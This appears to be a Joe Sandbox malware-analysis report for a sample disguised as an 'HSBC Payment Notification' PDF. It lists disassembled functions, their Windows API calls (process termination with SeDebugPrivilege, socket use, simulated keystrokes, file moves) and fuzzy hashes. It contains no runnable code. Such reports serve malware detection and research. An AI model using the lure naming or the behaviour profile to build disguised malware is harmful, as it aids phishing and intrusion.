Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55

Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4

Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32

lstrcmpiW.KERNEL32(?,?), ref: 00464D40
_wcscmp.LIBCMT ref: 00464D5A
MoveFileW.KERNEL32(?,?), ref: 00464D75

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B

Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D

Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
DestroyIcon.USER32(00000000), ref: 0043C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
DestroyIcon.USER32(?), ref: 0043C3AB

Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68

Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24

Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
_wcscat.LIBCMT ref: 00486EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2

Strings

SysListView32, xrefs: 00486DF6

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68

Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
GetLastError.KERNEL32 ref: 0047E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
GetLastError.KERNEL32(00000000), ref: 0047EA6E
CloseHandle.KERNEL32(00000000), ref: 0047EAA3

Strings

SeDebugPrivilege, xrefs: 0047E9C2

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99

Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00463033

Strings

stop, xrefs: 00463004
question, xrefs: 00462FEC
warning, xrefs: 0046301C
blank, xrefs: 00462FB5
info, xrefs: 00462FD4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE

Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
LoadStringW.USER32(00000000), ref: 00464319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
LoadStringW.USER32(00000000), ref: 00464336
_wprintf.LIBCMT ref: 0046435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00464357

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79

Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D

Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004861EB
GetDC.USER32(00000000), ref: 004861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
ReleaseDC.USER32(00000000,00000000), ref: 0048620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68

Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_wcstok.LIBCMT ref: 0046EC94
_wcscpy.LIBCMT ref: 0046ED23
_memset.LIBCMT ref: 0046ED56

Strings

X, xrefs: 0046ED93

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: c91ed4c1db3eaf160e6426a3c9cbafba05b6d1eebd81997a596445fd3a2e4ee9
Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
Opcode Fuzzy Hash: c91ed4c1db3eaf160e6426a3c9cbafba05b6d1eebd81997a596445fd3a2e4ee9
Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B

Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
WSAGetLastError.WSOCK32(00000000), ref: 00476C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
inet_ntoa.WSOCK32(?), ref: 00476CA7

Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815

_strlen.LIBCMT ref: 00476D44
_memmove.LIBCMT ref: 00476DAD

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 19e8c2658f20f8476ca2da37bc64e6d1bda1729b0b31d87f1c8584a2e783eb2e
Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
Opcode Fuzzy Hash: 19e8c2658f20f8476ca2da37bc64e6d1bda1729b0b31d87f1c8584a2e783eb2e
Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59

Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00460F8C
GetKeyboardState.USER32(?), ref: 00460FA1
SetKeyboardState.USER32(?), ref: 00461002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A

Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00460DA5
GetKeyboardState.USER32(?), ref: 00460DBA
SetKeyboardState.USER32(?), ref: 00460E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

